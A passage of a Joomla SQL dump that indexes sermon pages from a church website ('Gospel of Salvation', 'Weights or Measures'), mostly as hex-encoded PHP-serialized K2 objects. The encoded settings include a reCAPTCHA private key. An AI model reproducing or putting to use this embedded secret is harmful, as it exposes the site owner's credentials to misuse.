20c49e7c472c20c49f7c672c20c4a07c472c20c4a17c672c20c4a27c472c20c4a37c672c20c4a47c482c20c4a57c682c20c4a67c482c20c4a77c682c20c38c7c492c20c38d7c492c20c38e7c492c20c38f7c492c20c3ac7c692c20c3ad7c692c20c3ae7c692c20c3af7c692c20c4a87c492c20c4a97c692c20c4aa7c492c20c4ab7c692c20c4ac7c492c20c4ad7c692c20c4ae7c492c20c4af7c692c20c4b07c492c20c4b17c692c20c4b47c4a2c20c4b57c6a2c20c4b67c4b2c20c4b77c6b2c20c4b87c6b2c20c4b97c4c2c20c4ba7c6c2c20c4bb7c4c2c20c4bc7c6c2c20c4bd7c4c2c20c4be7c6c2c20c4bf7c4c2c20c5807c6c2c20c5817c4c2c20c5827c6c2c20c3917c4e2c20c3b17c6e2c20c5837c4e2c20c5847c6e2c20c5857c4e2c20c5867c6e2c20c5877c4e2c20c5887c6e2c20c5897c6e2c20c58a7c4e2c20c58b7c6e2c20c3927c4f2c20c3937c4f2c20c3947c4f2c20c3957c4f2c20c3967c4f2c20c3987c4f2c20c3b27c6f2c20c3b37c6f2c20c3b47c6f2c20c3b57c6f2c20c3b67c6f2c20c3b87c6f2c20c58c7c4f2c20c58d7c6f2c20c58e7c4f2c20c58f7c6f2c20c5907c4f2c20c5917c6f2c20c5947c522c20c5957c722c20c5967c522c20c5977c722c20c5987c522c20c5997c722c20c59a7c532c20c59b7c732c20c59c7c532c20c59d7c732c20c59e7c532c20c59f7c732c20c5a07c532c20c5a17c732c20c5bf7c732c20c5a27c542c20c5a37c742c20c5a47c542c20c5a57c742c20c5a67c542c20c5a77c742c20c3997c552c20c39a7c552c20c39b7c552c20c39c7c552c20c3b97c752c20c3ba7c752c20c3bb7c752c20c3bc7c752c20c5a87c552c20c5a97c752c20c5aa7c552c20c5ab7c752c20c5ac7c552c20c5ad7c752c20c5ae7c552c20c5af7c752c20c5b07c552c20c5b17c752c20c5b27c552c20c5b37c752c20c5b47c572c20c5b57c772c20c39d7c592c20c3bd7c792c20c3bf7c792c20c5b67c592c20c5b77c792c20c5b87c592c20c5b97c5a2c20c5ba7c7a2c20c5bb7c5a2c20c5bc7c7a2c20c5bd7c5a2c20c5be7c7a2c20ceb17c612c20ceb27c622c20ceb37c672c20ceb47c642c20ceb57c652c20ceb67c7a2c20ceb77c682c20ceb87c74682c20ceb97c692c20ceba7c6b2c20cebb7c6c2c20cebc7c6d2c20cebd7c6e2c20cebe7c782c20cebf7c6f2c20cf807c702c20cf817c722c20cf837c732c20cf847c742c20cf857c792c20cf867c662c20cf877c63682c20cf887c70732c20cf897c772c20ce917c412c20ce927c422c20ce937c472c20ce947c442c20ce957c452c20ce967c5a2c20ce977c482c20ce987c54682c20ce997c492c20ce9a7c4b2c20ce9b7c4c2c20ce9c7c4d2c20ce9e7c582c20ce9f7c4f2c20cea07c502c20cea17c522c20cea37c532c20cea47c542c20cea57c592c20cea67c462c20cea77c43682c20cea87c50732c20cea97c572c20ceac7c612c20cead7c652c20ceae7c682c20ceaf7c692c20cf8c7c6f2c20cf8d7c792c20cf8e7c772c20ce867c412c20ce887c452c20ce897c482c20ce8a7c492c20ce8c7c4f2c20ce8e7c592c20ce8f7c572c20cf8a7c692c20ce907c692c20cf8b7c792c20cf827c732c20d0907c412c20d3907c412c20d3927c412c20d3987c452c20d39a7c452c20d3947c452c20d0917c422c20d0927c562c20d0937c472c20d2907c472c20d0837c472c20d2927c472c20d3b67c472c20797c592c20d0947c442c20d0957c452c20d0807c452c20d0817c594f2c20d3967c452c20d2bc7c452c20d2be7c452c20d0847c59452c20d0967c5a482c20d3817c445a482c20d2967c5a482c20d39c7c445a482c20d0977c5a2c20d2987c5a2c20d39e7c445a2c20d3a07c445a2c20d0857c445a2c20d0987c492c20d08d7c492c20d3a47c492c20d3a27c492c20d0867c492c20d0877c4a492c20d3807c492c20d0997c592c20d28a7c592c20d0887c4a2c20d09a7c4b2c20d29a7c512c20d29e7c512c20d2a07c4b2c20d3837c512c20d29c7c4b2c20d09b7c4c2c20d3857c4c2c20d0897c4c2c20d09c7c4d2c20d38d7c4d2c20d09d7c4e2c20d3897c4e2c20d2a27c4e2c20d3877c4e2c20d2a47c4e2c20d08a7c4e2c20d09e7c4f2c20d3a67c4f2c20d3a87c4f2c20d3aa7c4f2c20d2a87c4f2c20d09f7c502c20d2a67c50462c20d0a07c502c20d28e7c502c20d0a17c532c20d2aa7c532c20d0a27c542c20d2ac7c54482c20d08b7c542c20d08c7c4b2c20d0a37c552c20d08e7c552c20d3b27c552c20d3b07c552c20d3ae7c552c20d2ae7c552c20d2b07c552c20d0a47c462c20d0a57c482c20d2b27c482c20d2ba7c482c20d0a67c54532c20d2b47c54532c20d0a77c43482c20d3b47c43482c20d2b67c43482c20d38b7c43482c20d2b87c43482c20d08f7c445a2c20d0a87c53482c20d0a97c5348542c20d0aa7c412c20d0ab7c592c20d3b87c592c20d0ac7c592c20d28c7c592c20d0ad7c452c20d3ac7c452c20d0ae7c59552c20d0af7c59412c20d0b07c612c20d3917c612c20d3937c612c20d3997c652c20d39b7c652c20d3957c652c20d0b17c622c20d0b27c762c20d0b37c672c20d2917c672c20d1937c672c20d2937c672c20d3b77c672c20797c792c20d0b47c642c20d0b57c652c20d1907c652c20d1917c796f2c20d3977c652c20d2bd7c652c20d2bf7c652c20d1947c79652c20d0b67c7a682c20d3827c647a682c20d2977c7a682c20d39d7c647a682c20d0b77c7a2c20d2997c7a2c20d39f7c647a2c20d3a17c647a2c20d1957c647a2c20d0b87c692c20d19d7c692c20d3a57c692c20d3a37c692c20d1967c692c20d1977c6a692c20d3807c692c20d0b97c792c20d28b7c792c20d1987c6a2c20d0ba7c6b2c20d29b7c712c20d29f7c712c20d2a17c6b2c20d3847c712c20d29d7c6b2c20d0bb7c6c2c20d3867c6c2c20d1997c6c2c20d0bc7c6d2c20d38e7c6d2c20d0bd7c6e2c20d38a7c6e2c20d2a37c6e2c20d3887c6e2c20d2a57c6e2c20d19a7c6e2c20d0be7c6f2c20d3a77c6f2c20d3a97c6f2c20d3ab7c6f2c20d2a97c6f2c20d0bf7c702c20d2a77c70662c20d1807c702c20d28f7c702c20d1817c732c20d2ab7c732c20d1827c742c20d2ad7c74682c20d19b7c742c20d19c7c6b2c20d1837c752c20d19e7c752c20d3b37c752c20d3b17c752c20d3af7c752c20d2af7c752c20d2b17c752c20d1847c662c20d1857c682c20d2b37c682c20d2bb7c682c20d1867c74732c20d2b57c74732c20d1877c63682c20d3b57c63682c20d2b77c63682c20d38c7c63682c20d2b97c63682c20d19f7c647a2c20d1887c73682c20d1897c7368742c20d18a7c612c20d18b7c792c20d3b97c792c20d18c7c792c20d28d7c792c20d18d7c652c20d3ad7c652c20d18e7c79752c20d18f7c7961223b733a353a226b32536566223b733a313a2230223b733a31333a226b325365664c6162656c436174223b733a373a22636f6e74656e74223b733a31333a226b325365664c6162656c546167223b733a333a22746167223b733a31343a226b325365664c6162656c55736572223b733a363a22617574686f72223b733a31363a226b325365664c6162656c536561726368223b733a363a22736561726368223b733a31343a226b325365664c6162656c44617465223b733a343a2264617465223b733a31343a226b325365664c6162656c4974656d223b733a313a2230223b733a32363a226b325365664c6162656c4974656d437573746f6d507265666978223b733a303a22223b733a31373a226b32536566496e736572744974656d4964223b733a313a2231223b733a32343a226b325365664974656d49645469746c65416c696173536570223b733a343a2264617368223b733a32323a226b325365665573654974656d5469746c65416c696173223b733a313a2231223b733a31363a226b32536566496e736572744361744964223b733a313a2231223b733a32333a226b3253656643617449645469746c65416c696173536570223b733a343a2264617368223b733a32313a226b325365665573654361745469746c65416c696173223b733a313a2231223b7d733a31343a22002a00696e697469616c697a6564223b623a313b733a393a22736570617261746f72223b733a313a222e223b7d733a373a226d6574616b6579223b733a303a22223b733a383a226d65746164657363223b733a303a22223b733a383a226d65746164617461223b4f3a32343a224a6f6f6d6c615c52656769737472795c5265676973747279223a333a7b733a373a22002a0064617461223b4f3a383a22737464436c617373223a323a7b733a363a22726f626f7473223b733a303a22223b733a363a22617574686f72223b733a303a22223b7d733a31343a22002a00696e697469616c697a6564223b623a313b733a393a22736570617261746f72223b733a313a222e223b7d733a383a226f72646572696e67223b733a323a223134223b733a353a227472617368223b733a313a2230223b733a393a226361745f7472617368223b733a313a2230223b733a383a2263617465676f7279223b733a353a224661697468223b733a393a226361745f7374617465223b733a313a2231223b733a31303a226361745f616363657373223b733a313a2231223b733a31393a2265787472615f6669656c64735f736561726368223b733a303a22223b733a31323a2265787472615f6669656c6473223b733a323a225b5d223b733a343a22736c7567223b733a31323a2232383a73616c766174696f6e223b733a373a22636174736c7567223b733a373a22323a6661697468223b733a363a22617574686f72223b733a393a224c6966656f61736973223b733a363a226c61796f7574223b733a343a226974656d223b733a343a2270617468223b733a33303a22636f6d706f6e656e742f6b322f6974656d2f32382d73616c766174696f6e223b733a31303a226d657461617574686f72223b4e3b7d733a31353a22002a00696e737472756374696f6e73223b613a353a7b693a313b613a333a7b693a303b733a353a227469746c65223b693a313b733a383a227375627469746c65223b693a323b733a323a226964223b7d693a323b613a323a7b693a303b733a373a2273756d6d617279223b693a313b733a343a22626f6479223b7d693a333b613a393a7b693a303b733a343a226d657461223b693a313b733a31303a226c6973745f7072696365223b693a323b733a31303a2273616c655f7072696365223b693a333b733a373a226d6574616b6579223b693a343b733a383a226d65746164657363223b693a353b733a31303a226d657461617574686f72223b693a363b733a363a22617574686f72223b693a373b733a31363a22637265617465645f62795f616c696173223b693a383b733a31393a2265787472615f6669656c64735f736561726368223b7d693a343b613a323a7b693a303b733a343a2270617468223b693a313b733a353a22616c696173223b7d693a353b613a313a7b693a303b733a383a22636f6d6d656e7473223b7d7d733a31313a22002a007461786f6e6f6d79223b613a353a7b733a343a2254797065223b613a313a7b733a373a224b32204974656d223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a373a224b32204974656d223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a363a22417574686f72223b613a313a7b733a393a224c6966656f61736973223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a393a224c6966656f61736973223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a31313a224b322043617465676f7279223b613a313a7b733a353a224661697468223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a353a224661697468223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a383a224c616e6775616765223b613a313a7b733a313a222a223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a313a222a223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a31323a224578747261206669656c6473223b613a313a7b733a323a225b5d223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a323a225b5d223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d7d733a333a2275726c223b733a33393a22696e6465782e7068703f6f7074696f6e3d636f6d5f6b3226766965773d6974656d2669643d3238223b733a353a22726f757465223b733a34393a22696e6465782e7068703f6f7074696f6e3d636f6d5f6b3226766965773d6974656d2669643d32383a73616c766174696f6e223b733a353a227469746c65223b733a34323a22437269746963616c20506f696e747320696e2074686520476f7370656c206f662053616c766174696f6e223b733a31313a226465736372697074696f6e223b733a3339303a2220546578743a204163747320333a313720e2809320656e642e20416e64206e6f772c20627265746872656e2c204920776f742074686174207468726f7567682069676e6f72616e6365207965206469642069742c2061732064696420616c736f20796f75722072756c6572732e203138204275742074686f7365207468696e67732c20776869636820476f64206265666f7265206861642073686577656420627920746865206d6f757468206f6620616c6c206869732070726f70686574732c2074686174204368726973742073686f756c64207375666665722c206865206861746820736f2066756c66696c6c65642e20313920526570656e74207965207468657265666f72652c20616e6420626520636f6e7665727465642c207468617420796f75722073696e73206d617920626520626c6f74746564206f75742c207768656e207468652074696d6573206f662072656672657368696e67207368616c6c20636f6d652066726f6d207468652070726573656e6365206f6620746865204c6f72643b20223b733a393a227075626c6973686564223b4e3b733a353a227374617465223b693a313b733a363a22616363657373223b733a313a2231223b733a383a226c616e6775616765223b733a313a222a223b733a31383a227075626c6973685f73746172745f64617465223b733a31393a22323031372d30332d30342032323a33363a3136223b733a31363a227075626c6973685f656e645f64617465223b733a31393a22303030302d30302d30302030303a30303a3030223b733a31303a2273746172745f64617465223b733a31393a22323031372d30332d30342032323a33363a3136223b733a383a22656e645f64617465223b733a31393a22303030302d30302d30302030303a30303a3030223b733a31303a226c6973745f7072696365223b4e3b733a31303a2273616c655f7072696365223b4e3b733a373a22747970655f6964223b693a323b733a31353a2264656661756c744c616e6775616765223b733a353a22656e2d4742223b7d);
INSERT INTO `y57u5_finder_links` (`link_id`, `url`, `route`, `title`, `description`, `indexdate`, `md5sum`, `published`, `state`, `access`, `language`, `publish_start_date`, `publish_end_date`, `start_date`, `end_date`, `list_price`, `sale_price`, `type_id`, `object`) VALUES
(245, 'index.php?option=com_k2&view=item&id=31', 'index.php?option=com_k2&view=item&id=31:importance-and-significance-of-weights-or-measures', 'Importance and Significance of Weights or Measures', ' Texts: Micah 6:11, Prov. 16:11, Deu.25:13-16 Introduction Weights could be literal or implied. Literal in terms of things used to get the accurate measure or value of a thing such as scales, tape rule, containers, kegs, bowls, certificate after a course, exam results from one class to the other etc. this enables one to know the level, the true worth and value. A weight is a neutral judge. It simple spells out what is there! ', '2017-06-25 14:18:33', '52f63faf8476b5ab8954d0fbbb7d3bf2', 1, 1, 1, '*', '2017-03-12 16:54:58', '0000-00-00 00:00:00', '2017-03-12 16:54:58', '0000-00-00 00:00:00', 0, 0, 2, 0x4f3a31393a2246696e646572496e6465786572526573756c74223a31393a7b733a31313a22002a00656c656d656e7473223b613a32373a7b733a323a226964223b733a323a223331223b733a353a22616c696173223b733a35303a22696d706f7274616e63652d616e642d7369676e69666963616e63652d6f662d776569676874732d6f722d6d65617375726573223b733a373a2273756d6d617279223b733a3436333a223c703ec2a03c2f703e0d0a3c703e54657874733a204d6963616820363a31312c2050726f762e2031363a31312c204465752e32353a31332d31363c2f703e0d0a3c703e496e74726f64756374696f6e3c2f703e0d0a3c703e5765696768747320636f756c64206265206c69746572616c206f7220696d706c6965642e204c69746572616c20696e207465726d73206f66207468696e6773207573656420746f2067657420746865206163637572617465206d656173757265206f722076616c7565206f662061207468696e672073756368206173207363616c65732c20746170652072756c652c20636f6e7461696e6572732c206b6567732c20626f776c732c206365727469666963617465206166746572206120636f757273652c206578616d20726573756c74732066726f6d206f6e6520636c61737320746f20746865206f74686572206574632e207468697320656e61626c6573206f6e6520746f206b6e6f7720746865206c6576656c2c20746865207472756520776f72746820616e642076616c75652e2041207765696768742069732061206e65757472616c206a756467652e2049742073696d706c65207370656c6c73206f75742077686174206973207468657265213c2f703e0d0a223b733a343a22626f6479223b733a3932353a220d0a3c703e57656967687473206f72206d6561737572657320636f756c6420626520696d706c6965643b206a75737420776569676874206d617920726566657220746f206265696e672072696768742c2074656c6c696e67207468652074727574682c20686176696e6720696e746567726974792c20696e6e6f63656e63652c206265696e6720737472616967687420666f72776172642c207269676874207374616e64617264206f7220636f72726563742076616c7565732e3c2f703e0d0a3c703e4d616e792070656f706c652077616e7420746f20706179206c65737320616e642074616b65206d6f72652c206f722073656c6c206c65737320616e6420636f6c6c656374206d6f7265206d6f6e65792c206368656174206f74686572732c2074656c6c206c6965732c2070726574656e642c20616464206f722072656d6f7665207468696e677320666f72206d6f7265206f7220696c6c6567616c206761696e2c206368616e676520666967757265732c20626561722066616c7365207769746e6573733b20616c6c207468657365206d6179206272696e67206d6f7265206d6f6e65792c206d6f72652070726f6d6f74696f6e206f72206d6f726520706879736963616c20616476616e63656d656e7420696e20706879736963616c206c6966652062757420646f65732067726561742064616d61676520746f2074686520636f6e736369656e6365206f662061206d616e2c20657370656369616c6c79207468652062656c696576657220616e64206173206865206465616c73207769746820746865206a7573742077656967687420736f20697320686520696e736964652d207374726169676874206f722062656e742d20746865206d6f6e657920796f75206d6f76652066726f6d207269676874207468696e6720746f20706c656173652074686520666c6573682c20746865206d6f726520796f7520617265207368696674696e672066726f6d20476f64e28099732070726573656e636520746f20776865726520486973206c6966652c20766f69636520616e6420706f7765722063616ee280997420726561636820796f752e2054686520646f637472696e65206f66206a7573742077656967687420697320686967686c7920657373656e7469616c2e3c2f703e0d0a3c703e4d617920796f7520626520726963686c7920626c657373656420617320776520676f20696e746f20746869732073657269657320696e20746865206e616d65206f66204a657375732e3c2f703e223b733a353a226361746964223b733a313a2232223b733a31303a22637265617465645f6279223b733a333a22313936223b733a31363a22637265617465645f62795f616c696173223b733a303a22223b733a383a226d6f646966696564223b733a31393a22323031372d30332d32302031373a32393a3234223b733a31313a226d6f6469666965645f6279223b733a333a22313936223b733a363a22706172616d73223b4f3a32343a224a6f6f6d6c615c52656769737472795c5265676973747279223a333a7b733a373a22002a0064617461223b4f3a383a22737464436c617373223a3135323a7b733a31303a22656e61626c655f637373223b733a313a2230223b733a31343a226a517565727948616e646c696e67223b733a313a2230223b733a32313a226261636b656e644a517565727948616e646c696e67223b733a353a226c6f63616c223b733a383a22757365724e616d65223b733a313a2230223b733a393a2275736572496d616765223b733a313a2230223b733a31353a22757365724465736372697074696f6e223b733a313a2230223b733a373a227573657255524c223b733a313a2231223b733a393a2275736572456d61696c223b733a313a2230223b733a31323a2275736572466565644c696e6b223b733a313a2230223b733a31323a22757365724665656449636f6e223b733a313a2231223b733a31333a22757365724974656d436f756e74223b733a323a223130223b733a31333a22757365724974656d5469746c65223b733a313a2231223b733a31393a22757365724974656d5469746c654c696e6b6564223b733a313a2231223b733a31393a22757365724974656d4461746543726561746564223b733a313a2231223b733a31333a22757365724974656d496d616765223b733a313a2231223b733a31373a22757365724974656d496e74726f54657874223b733a313a2231223b733a31363a22757365724974656d43617465676f7279223b733a313a2230223b733a31323a22757365724974656d54616773223b733a313a2231223b733a32323a22757365724974656d436f6d6d656e7473416e63686f72223b733a313a2231223b733a31363a22757365724974656d526561644d6f7265223b733a313a2231223b733a31373a22757365724974656d4b32506c7567696e73223b733a313a2231223b733a31323a227461674974656d436f756e74223b733a323a223130223b733a31323a227461674974656d5469746c65223b733a313a2231223b733a31383a227461674974656d5469746c654c696e6b6564223b733a313a2231223b733a31383a227461674974656d4461746543726561746564223b733a313a2231223b733a31323a227461674974656d496d616765223b733a313a2231223b733a31363a227461674974656d496e74726f54657874223b733a313a2231223b733a31353a227461674974656d43617465676f7279223b733a313a2231223b733a31353a227461674974656d526561644d6f7265223b733a313a2231223b733a31383a227461674974656d45787472614669656c6473223b733a313a2230223b733a31313a227461674f72646572696e67223b733a353a22616c706861223b733a31313a22746167466565644c696e6b223b733a313a2231223b733a31313a227461674665656449636f6e223b733a313a2231223b733a31363a2267656e657269634974656d436f756e74223b733a323a223130223b733a31363a2267656e657269634974656d5469746c65223b733a313a2231223b733a32323a2267656e657269634974656d5469746c654c696e6b6564223b733a313a2231223b733a32323a2267656e657269634974656d4461746543726561746564223b733a313a2231223b733a31363a2267656e657269634974656d496d616765223b733a313a2231223b733a32303a2267656e657269634974656d496e74726f54657874223b733a313a2231223b733a31393a2267656e657269634974656d43617465676f7279223b733a313a2231223b733a31393a2267656e657269634974656d526561644d6f7265223b733a313a2231223b733a32323a2267656e657269634974656d45787472614669656c6473223b733a313a2230223b733a31353a2267656e65726963466565644c696e6b223b733a313a2231223b733a31353a2267656e657269634665656449636f6e223b733a313a2231223b733a393a22666565644c696d6974223b733a323a223130223b733a31333a22666565644974656d496d616765223b733a313a2230223b733a31313a2266656564496d6753697a65223b733a313a2253223b733a31373a22666565644974656d496e74726f54657874223b733a313a2231223b733a31373a226665656454657874576f72644c696d6974223b733a303a22223b733a31363a22666565644974656d46756c6c54657874223b733a313a2231223b733a31323a22666565644974656d54616773223b733a313a2230223b733a31333a22666565644974656d566964656f223b733a313a2230223b733a31353a22666565644974656d47616c6c657279223b733a313a2230223b733a31393a22666565644974656d4174746163686d656e7473223b733a313a2230223b733a31343a2266656564426f677573456d61696c223b733a303a22223b733a31363a22696e74726f54657874436c65616e7570223b733a313a2230223b733a32373a22696e74726f54657874436c65616e75704578636c75646554616773223b733a303a22223b733a32333a22696e74726f54657874436c65616e757054616741747472223b733a303a22223b733a31353a2266756c6c54657874436c65616e7570223b733a313a2230223b733a32363a2266756c6c54657874436c65616e75704578636c75646554616773223b733a303a22223b733a32323a2266756c6c54657874436c65616e757054616741747472223b733a303a22223b733a31323a2278737346696c746572696e67223b733a313a2230223b733a31343a226c696e6b506f7075705769647468223b733a333a22393030223b733a31353a226c696e6b506f707570486569676874223b733a333a22363030223b733a31333a22696d616765735175616c697479223b733a333a22313030223b733a31313a226974656d496d6167655853223b733a323a223634223b733a31303a226974656d496d61676553223b733a333a22323030223b733a31303a226974656d496d6167654d223b733a333a22383536223b733a31303a226974656d496d6167654c223b733a333a22383536223b733a31313a226974656d496d616765584c223b733a333a22383536223b733a31363a226974656d496d61676547656e65726963223b733a333a22383536223b733a31333a22636174496d6167655769647468223b733a333a22313030223b733a31353a22636174496d61676544656661756c74223b733a313a2230223b733a31343a2275736572496d6167655769647468223b733a323a223634223b733a31363a2275736572496d61676544656661756c74223b733a313a2231223b733a31373a22636f6d6d656e746572496d675769647468223b733a323a223438223b733a31373a226f6e6c696e65496d616765456469746f72223b733a393a2273756d6f7061696e74223b733a31343a22696d61676554696d657374616d70223b733a313a2230223b733a31363a22696d6167654d656d6f72794c696d6974223b733a303a22223b733a31363a22736f6369616c427574746f6e436f6465223b733a303a22223b733a31353a2274776974746572557365726e616d65223b733a303a22223b733a31363a2266616365626f6f6b4d65746174616773223b733a313a2231223b733a31333a2266616365626f6f6b496d616765223b733a363a2258536d616c6c223b733a383a22636f6d6d656e7473223b733a313a2232223b733a31363a22636f6d6d656e74734f72646572696e67223b733a343a2244455343223b733a31333a22636f6d6d656e74734c696d6974223b733a323a223130223b733a32303a22636f6d6d656e7473466f726d506f736974696f6e223b733a353a2262656c6f77223b733a31383a22636f6d6d656e74735075626c697368696e67223b733a313a2231223b733a31373a22636f6d6d656e74735265706f7274696e67223b733a313a2232223b733a32333a22636f6d6d656e74735265706f7274526563697069656e74223b733a303a22223b733a32343a22696e6c696e65436f6d6d656e74734d6f6465726174696f6e223b733a313a2230223b733a383a226772617661746172223b733a313a2231223b733a383a22616e74697370616d223b733a393a22726563617074636861223b733a32323a22726563617074636861466f7252656769737465726564223b733a313a2231223b733a32303a22616b69736d6574466f7252656769737465726564223b733a313a2230223b733a31373a22636f6d6d656e7473466f726d4e6f746573223b733a313a2231223b733a32313a22636f6d6d656e7473466f726d4e6f74657354657874223b733a303a22223b733a31353a2266726f6e74656e6445646974696e67223b733a313a2231223b733a31323a2273686f77496d616765546162223b733a313a2231223b733a31393a2273686f77496d61676547616c6c657279546162223b733a313a2231223b733a31323a2273686f77566964656f546162223b733a313a2231223b733a31383a2273686f7745787472614669656c6473546162223b733a313a2231223b733a31383a2273686f774174746163686d656e7473546162223b733a313a2231223b733a31333a2273686f774b32506c7567696e73223b733a313a2231223b733a32323a2273696465426172446973706c617946726f6e74656e64223b733a313a2230223b733a31323a226d65726765456469746f7273223b733a313a2231223b733a31343a2273696465426172446973706c6179223b733a313a2231223b733a31373a226174746163686d656e7473466f6c646572223b733a303a22223b733a31363a2268696465496d706f7274427574746f6e223b733a313a2230223b733a31323a22676f6f676c65536561726368223b733a313a2230223b733a32313a22676f6f676c65536561726368436f6e7461696e6572223b733a31313a226b32436f6e7461696e6572223b733a31333a224b325573657250726f66696c65223b733a313a2230223b733a31313a224b325573657247726f7570223b733a313a2231223b733a383a227265646972656374223b733a333a22313038223b733a31313a2261646d696e536561726368223b733a363a2273696d706c65223b733a31323a22636f6f6b6965446f6d61696e223b733a303a22223b733a31363a2267617468657253746174697374696373223b733a313a2231223b733a31333a2274616767696e6753797374656d223b733a313a2231223b733a383a226c6f636b54616773223b733a313a2230223b733a31333a2273686f7754616746696c746572223b733a313a2230223b733a393a226b325461674e6f726d223b733a313a2230223b733a31333a226b325461674e6f726d43617365223b733a353a226c6f776572223b733a33313a226b325461674e6f726d4164646974696f6e616c5265706c6163656d656e7473223b733a303a22223b733a32303a227265636170746368615f7075626c69635f6b6579223b733a34303a22364c667869686b5541414141414d6354446653334b74436877475658796a5a69634a36665755514d223b733a32313a227265636170746368615f707269766174655f6b6579223b733a37323a22364c667869686b554141414141476a736f4f3955375f61324c693558364a5250484a6b73556d4555205374657020313a20636c69656e742d7369646520696e746567726174696f6e223b733a31353a227265636170746368615f7468656d65223b733a353a22636c65616e223b733a31313a227265636170746368615632223b733a313a2231223b733a32333a227265636170746368614f6e526567697374726174696f6e223b733a313a2231223b733a31333a22616b69736d65744170694b6579223b733a303a22223b733a31333a2273746f70466f72756d5370616d223b733a313a2230223b733a31393a2273746f70466f72756d5370616d4170694b6579223b733a303a22223b733a31383a2270726f66696c6550616765446973706c6179223b733a313a2230223b733a32313a2273686f774974656d73436f756e74657241646d696e223b733a313a2231223b733a31373a2273686f774368696c644361744974656d73223b733a313a2231223b733a32323a2264697361626c65436f6d706163744f72646572696e67223b733a313a2230223b733a31333a226d657461446573634c696d6974223b733a333a22313530223b733a32323a22656e666f7263655345465265706c6163656d656e7473223b733a313a2230223b733a31353a225345465265706c6163656d656e7473223b733a323736383a22c3807c412c20c3817c412c20c3827c412c20c3837c412c20c3847c412c20c3857c412c20c3a07c612c20c3a17c612c20c3a27c612c20c3a37c612c20c3a47c612c20c3a57c612c20c4807c412c20c4817c612c20c4827c412c20c4837c612c20c4847c412c20c4857c612c20c3877c432c20c3a77c632c20c4867c432c20c4877c632c20c4887c432c20c4897c632c20c48a7c432c20c48b7c632c20c48c7c432c20c48d7c632c20c3907c442c20c3b07c642c20c48e7c442c20c48f7c642c20c4907c442c20c4917c642c20c3887c452c20c3897c452c20c38a7c452c20c38b7c452c20c3a87c652c20c3a97c652c20c3aa7c652c20c3ab7c652c20c4927c452c20c4937c652c20c4947c452c20c4957c652c20c4967c452c20c4977c652c20c4987c452c20c4997c652c20c49a7c452c20c49b7c652c20c49c7c472c20c49d7c672c20c49e7c472c20c49f7c672c20c4a07c472c20c4a17c672c20c4a27c472c20c4a37c672c20c4a47c482c20c4a57c682c20c4a67c482c20c4a77c682c20c38c7c492c20c38d7c492c20c38e7c492c20c38f7c492c20c3ac7c692c20c3ad7c692c20c3ae7c692c20c3af7c692c20c4a87c492c20c4a97c692c20c4aa7c492c20c4ab7c692c20c4ac7c492c20c4ad7c692c20c4ae7c492c20c4af7c692c20c4b07c492c20c4b17c692c20c4b47c4a2c20c4b57c6a2c20c4b67c4b2c20c4b77c6b2c20c4b87c6b2c20c4b97c4c2c20c4ba7c6c2c20c4bb7c4c2c20c4bc7c6c2c20c4bd7c4c2c20c4be7c6c2c20c4bf7c4c2c20c5807c6c2c20c5817c4c2c20c5827c6c2c20c3917c4e2c20c3b17c6e2c20c5837c4e2c20c5847c6e2c20c5857c4e2c20c5867c6e2c20c5877c4e2c20c5887c6e2c20c5897c6e2c20c58a7c4e2c20c58b7c6e2c20c3927c4f2c20c3937c4f2c20c3947c4f2c20c3957c4f2c20c3967c4f2c20c3987c4f2c20c3b27c6f2c20c3b37c6f2c20c3b47c6f2c20c3b57c6f2c20c3b67c6f2c20c3b87c6f2c20c58c7c4f2c20c58d7c6f2c20c58e7c4f2c20c58f7c6f2c20c5907c4f2c20c5917c6f2c20c5947c522c20c5957c722c20c5967c522c20c5977c722c20c5987c522c20c5997c722c20c59a7c532c20c59b7c732c20c59c7c532c20c59d7c732c20c59e7c532c20c59f7c732c20c5a07c532c20c5a17c732c20c5bf7c732c20c5a27c542c20c5a37c742c20c5a47c542c20c5a57c742c20c5a67c542c20c5a77c742c20c3997c552c20c39a7c552c20c39b7c552c20c39c7c552c20c3b97c752c20c3ba7c752c20c3bb7c752c20c3bc7c752c20c5a87c552c20c5a97c752c20c5aa7c552c20c5ab7c752c20c5ac7c552c20c5ad7c752c20c5ae7c552c20c5af7c752c20c5b07c552c20c5b17c752c20c5b27c552c20c5b37c752c20c5b47c572c20c5b57c772c20c39d7c592c20c3bd7c792c20c3bf7c792c20c5b67c592c20c5b77c792c20c5b87c592c20c5b97c5a2c20c5ba7c7a2c20c5bb7c5a2c20c5bc7c7a2c20c5bd7c5a2c20c5be7c7a2c20ceb17c612c20ceb27c622c20ceb37c672c20ceb47c642c20ceb57c652c20ceb67c7a2c20ceb77c682c20ceb87c74682c20ceb97c692c20ceba7c6b2c20cebb7c6c2c20cebc7c6d2c20cebd7c6e2c20cebe7c782c20cebf7c6f2c20cf807c702c20cf817c722c20cf837c732c20cf847c742c20cf857c792c20cf867c662c20cf877c63682c20cf887c70732c20cf897c772c20ce917c412c20ce927c422c20ce937c472c20ce947c442c20ce957c452c20ce967c5a2c20ce977c482c20ce987c54682c20ce997c492c20ce9a7c4b2c20ce9b7c4c2c20ce9c7c4d2c20ce9e7c582c20ce9f7c4f2c20cea07c502c20cea17c522c20cea37c532c20cea47c542c20cea57c592c20cea67c462c20cea77c43682c20cea87c50732c20cea97c572c20ceac7c612c20cead7c652c20ceae7c682c20ceaf7c692c20cf8c7c6f2c20cf8d7c792c20cf8e7c772c20ce867c412c20ce887c452c20ce897c482c20ce8a7c492c20ce8c7c4f2c20ce8e7c592c20ce8f7c572c20cf8a7c692c20ce907c692c20cf8b7c792c20cf827c732c20d0907c412c20d3907c412c20d3927c412c20d3987c452c20d39a7c452c20d3947c452c20d0917c422c20d0927c562c20d0937c472c20d2907c472c20d0837c472c20d2927c472c20d3b67c4